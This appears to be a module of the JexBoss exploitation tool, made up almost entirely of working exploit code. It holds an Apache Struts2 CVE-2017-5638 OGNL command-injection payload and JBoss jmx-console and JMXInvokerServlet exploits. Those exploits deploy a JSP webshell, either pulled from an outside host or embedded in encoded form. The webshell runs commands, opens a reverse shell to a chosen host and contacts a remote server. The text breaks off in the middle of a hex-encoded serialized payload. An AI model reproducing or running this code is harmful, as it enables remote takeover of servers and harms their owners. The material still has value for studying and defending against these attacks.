# -*- coding: utf-8 -*-
"""
Module to group exploits of the JexBoss
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import jexboss
from time import sleep
from random import randint
import urllib
import base64, gzip, zlib
from sys import version_info
from io import BytesIO
if version_info[0] >= 3:
from urllib.parse import quote
import socket
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
global gl_http_pool
def set_http_pool(pool):
"""
Configure pool http
:param pool: http pool
"""
global gl_http_pool
gl_http_pool = pool
def get_successfully(url, path):
"""
Test if a GET to a URL is successful
:param url: The base URL
:param path: The URL path
:return: The HTTP status code
"""
sleep(5)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers)
result = r.status
if result == 404:
sleep(7)
r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers)
result = r.status
return result
def exploit_struts2_jakarta_multipart(url,cmd, cookies):
"""
Exploit Jakarta Multipart parser in Apache Struts (CVE-2017-5638)
Exploit improved from available in metasploit. This version works against Windows with Eastern language.
:param url: The url to exploi
:param cmd: Command to execute
:return: output of executed command
"""
cmd = cmd.replace(' ', ' ')
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"User-Agent": jexboss.get_random_user_agent()}
content_type = ("%%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS)."
"(#_memberAccess?(#_memberAccess=#dm):"
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
"(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
"(#context.setMemberAccess(#dm))))."
"(#gift='%s')."
"(#isnix=(@java.lang.System@getProperty('file.separator').equals(\"/\")))."
"(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))."
"(#p=new java.lang.ProcessBuilder(#giftarray))."
"(#p.redirectErrorStream(true)).(#process=#p.start())."
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" %cmd)
headers['Content-Type'] = content_type
if cookies is not None: headers['Cookie'] = cookies
r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
if r.status == 404:
headers['Content-Type'] = 'text/html'
r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
if r.status == 200:
return " Could not get command output. You need to set up an Authoritative DNS and try to get the\n" \
" output of the commands via DNS covert channel.\n"
return str(r.data)
def exploit_struts2_jakarta_multipart_v2(url,cmd, cookies):
"""
# FIX: this is not ready yet...
Exploit Jakarta Multipart parser in Apache Struts (CVE-2017-5638)
Exploit improved from @frohoff version (https://gist.github.com/frohoff/a3e24764561c0c18b6270805140e7600#file-reqnull-txt)
:param url: The url to exploi
:param cmd: Command to execute
:return: output of executed command
"""
cmd = cmd.replace(' ', ' ')
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"User-Agent": jexboss.get_random_user_agent(),
"Content-Type": "multipart/form-data; boundary=e85e9b09934f4b9daaa7ff6352cdf2df"}
'''
payload = (b"%%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS)."
"(#_memberAccess?(#_memberAccess=#dm):"
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
"(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
"(#context.setMemberAccess(#dm))))."
"(#gift='%s')."
"(#isnix=(@java.lang.System@getProperty('file.separator').equals(\"/\")))."
"(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))."
"(#p=new java.lang.ProcessBuilder(#giftarray))."
"(#p.redirectErrorStream(true)).(#process=#p.start())."
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" %cmd)
body = "--e85e9b09934f4b9daaa7ff6352cdf2df\n"
body+="Content-Disposition: form-data; name=\"form\"; filename=\"%s\"\n"%payload
body+="Content-Type: application/octet-stream\n\n"
body+="jexboss\n"
body+="--e85e9b09934f4b9daaa7ff6352cdf2df--\n"
if cookies is not None: headers['Cookie'] = cookies
r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body)
return str(r.data)
'''
def exploit_jmx_console_main_deploy(url):
"""
Exploit MainDeployer to deploy a JSP shell.
Tested and working in JBoss 4, 6. (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://"+url
jsp = "http://www.joaomatosf.com/rnp/jexws4.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0="+jsp)
jexboss.print_and_flush(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " +
"\n available at: " + jsp + ENDC)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws4/jexws4.jsp")
def exploit_jmx_console_file_repository(url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5 and 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61"
"%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20"
"%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20"
"%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72"
"%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53"
"%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69"
"%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E"
"%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72"
"%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66"
"%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65"
"%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74"
"%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F"
"%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20"
"%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29"
"%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28"
"%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67"
"%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72"
"%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72"
"%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67"
"%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71"
"%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21"
"%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28"
"%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E"
"%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72"
"%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70"
"%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E"
"%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E"
"%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52"
"%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73"
"%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74"
"%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74"
"%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65"
"%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74"
"%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63"
"%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77"
"%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77"
"%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E"
"%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53"
"%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28"
"%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34"
"%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61"
"%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F"
"%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69"
"%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63"
"%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46"
"%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72"
"%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28"
"%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61"
"%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66"
"%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53"
"%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22"
"%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65"
"%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73"
"%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22"
"%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68"
"%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E"
"%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77"
"%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74"
"%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E"
"%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28"
"%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68"
"%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E"
"%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42"
"%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61"
"%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20"
"%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29"
"%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B"
"%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C"
"%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws4/jexws4.jsp")
def exploit_jmx_invoker_file_repository(url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xAC\xED\x00\x05\x73\x72\x00\x29\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63"
"\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x49\x6E\x76\x6F\x63\x61\x74\x69"
"\x6F\x6E\xF6\x06\x95\x27\x41\x3E\xA4\xBE\x0C\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xC1\xD0"
"\x53\x87\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12"
"\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\x61"
"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00"
"\x00\x78\x70")
payload += ("\xE3\x2C\x60\xE6") if version == 0 else ("\x26\x95\xBE\x0A")
payload += (
"\x73\x72\x00\x24\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x56\x61\x6C\x75\x65\xEA"
"\xCC\xE0\xD1\xF4\x4A\xD0\x99\x0C\x00\x00\x78\x70\x7A\x00\x00\x04\x00\x00\x00\x09\xD3\xAC\xED\x00"
"\x05\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B"
"\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1B\x6A\x61\x76"
"\x61\x78\x2E\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65"
"\x0F\x03\xA7\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x2C\x6A\x62\x6F\x73\x73\x2E\x61\x64"
"\x6D\x69\x6E\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x44\x65\x70\x6C\x6F\x79\x6D\x65\x6E\x74\x46\x69"
"\x6C\x65\x52\x65\x70\x6F\x73\x69\x74\x6F\x72\x79\x78\x74\x00\x05\x73\x74\x6F\x72\x65\x75\x71\x00"
"\x7E\x00\x00\x00\x00\x00\x05\x74\x00\x0B\x6A\x65\x78\x69\x6E\x76\x34\x2E\x77\x61\x72\x74\x00\x07"
"\x6A\x65\x78\x69\x6E\x76\x34\x74\x00\x04\x2E\x6A\x73\x70\x74\x08\x98\x3C\x25\x40\x20\x70\x61\x67"
"\x65\x20\x69\x6D\x70\x6F\x72\x74\x3D\x22\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x2A\x2C\x6A\x61"
"\x76\x61\x2E\x75\x74\x69\x6C\x2E\x2A\x2C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x2A\x2C\x6A\x61\x76\x61"
"\x2E\x6E\x65\x74\x2E\x2A\x22\x20\x70\x61\x67\x65\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x25\x3E\x20\x3C\x70\x72\x65\x3E\x20\x3C\x25\x20\x63\x6C\x61\x73\x73\x20\x72\x76"
"\x20\x65\x78\x74\x65\x6E\x64\x73\x20\x54\x68\x72\x65\x61\x64\x7B\x49\x6E\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x20\x69\x73\x3B\x4F\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x6F\x73\x3B\x72"
"\x76\x28\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x69\x73\x2C\x4F\x75\x74\x70\x75\x74\x53"
"\x74\x72\x65\x61\x6D\x20\x6F\x73\x29\x7B\x74\x68\x69\x73\x2E\x69\x73\x3D\x69\x73\x3B\x74\x68\x69"
"\x73\x2E\x6F\x73\x3D\x6F\x73\x3B\x7D\x70\x75\x62\x6C\x69\x63\x20\x76\x6F\x69\x64\x20\x72\x75\x6E"
"\x28\x29\x7B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x69\x6E\x3D\x6E\x75\x6C"
"\x6C\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x20\x6F\x75\x74\x3D\x6E\x75\x6C"
"\x6C\x3B\x74\x72\x79\x7B\x69\x6E\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x74\x68\x69\x73\x2E\x69\x73\x29\x29\x3B\x6F\x75\x74\x3D\x6E\x65\x77\x20\x42\x75\x66\x66"
"\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x28\x6E\x65\x77\x20\x4F\x75\x74\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x57\x72\x69\x74\x65\x72\x28\x74\x68\x69\x73\x2E\x6F\x73\x29\x29\x3B\x63\x68\x61\x72"
"\x20\x62\x5B\x5D\x3D\x6E\x65\x77\x20\x63\x68\x61\x72\x5B\x38\x31\x39\x32\x5D\x3B\x69\x6E\x74\x20"
"\x6C\x3B\x77\x68\x69\x6C\x65\x28\x28\x6C\x3D\x69\x6E\x2E\x72\x65\x61\x64\x28\x62\x2C\x30\x2C\x62"
"\x2E\x6C\x65\x6E\x67\x74\x68\x29\x29\x3E\x30\x29\x7B\x6F\x75\x74\x2E\x77\x72\x69\x74\x65\x28\x62"
"\x2C\x30\x2C\x6C\x29\x3B\x6F\x75\x74\x2E\x66\x6C\x75\x73\x68\x28\x29\x3B\x7D\x7D\x63\x61\x74\x63"
"\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x65\x29\x7B\x7D\x7D\x7D\x53\x74\x72\x69\x6E\x67"
"\x20\x73\x68\x3D\x6E\x75\x6C\x6C\x3B\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50"
"\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x21\x3D\x6E\x75\x6C\x6C\x29\x7B\x73"
"\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22"
"\x70\x70\x70\x22\x29\x3B\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67"
"\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x58\x2D\x4A\x45\x58\x22\x29\x21\x3D\x20\x6E\x75\x6C\x6C"
"\x29\x7B\x73\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x58\x2D\x4A\x45\x58\x22\x29\x3B\x7D\x69\x66\x28\x73\x68\x20\x21\x3D\x20\x6E\x75\x6C\x6C\x29\x7B"
"\x72\x65\x73\x70\x6F\x6E\x73\x65\x2E\x73\x65\x74\x43\x6F\x6E\x74\x65\x6E\x74\x54\x79\x70\x65\x28"
"\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x29\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x20\x62\x72\x3D\x6E\x75\x6C\x6C\x3B\x53\x74\x72\x69\x6E\x67\x20\x6C\x68\x63\x3D\x28"
"\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x2E\x73\x70"
"\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2B\x22\x68\x2E\x6C\x6F\x67\x22\x29\x2E\x72\x65\x70"
"\x6C\x61\x63\x65\x41\x6C\x6C\x28\x22\x20\x22\x2C\x22\x2D\x22\x29\x3B\x74\x72\x79\x7B\x69\x66\x28"
"\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x7A\x00\x00\x04\x00\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x6E\x6F\x2D\x63\x68\x65\x63\x6B\x2D\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3D\x3D\x6E\x75\x6C\x6C"
"\x29\x7B\x48\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x20\x63\x3D\x28\x48"
"\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x29\x6E\x65\x77\x20\x55\x52\x4C"
"\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x62\x73\x68\x65\x6C\x6C\x2E\x6A\x65\x78\x62\x6F\x73"
"\x73\x2E\x6E\x65\x74\x2F\x6A\x73\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x2E\x74\x78\x74\x22\x29\x2E"
"\x6F\x70\x65\x6E\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x28\x29\x3B\x63\x2E\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E"
"\x74\x22\x2C\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6F"
"\x73\x74\x22\x29\x2B\x22\x3C\x2D\x22\x2B\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x52\x65\x6D"
"\x6F\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3B\x69\x66\x28\x21\x6E\x65\x77\x20\x46\x69\x6C\x65\x28"
"\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x2E\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7B"
"\x50\x72\x69\x6E\x74\x57\x72\x69\x74\x65\x72\x20\x77\x3D\x6E\x65\x77\x20\x50\x72\x69\x6E\x74\x57"
"\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x3B\x77\x2E\x63\x6C"
"\x6F\x73\x65\x28\x29\x3B\x62\x72\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53"
"\x74\x72\x69\x6E\x67\x20\x6C\x76\x3D\x62\x72\x2E\x72\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x2E\x73"
"\x70\x6C\x69\x74\x28\x22\x20\x22\x29\x5B\x31\x5D\x3B\x69\x66\x28\x21\x6C\x76\x2E\x65\x71\x75\x61"
"\x6C\x73\x28\x22\x34\x22\x29\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x28\x22\x4E\x65\x77\x20"
"\x76\x65\x72\x73\x69\x6F\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x75\x70\x64\x61\x74\x65\x21\x22"
"\x29\x3B\x7D\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22"
"\x69\x64\x22\x29\x21\x3D\x2D\x31\x7C\x7C\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x69\x70"
"\x63\x6F\x6E\x66\x69\x67\x22\x29\x21\x3D\x2D\x31\x29\x7B\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
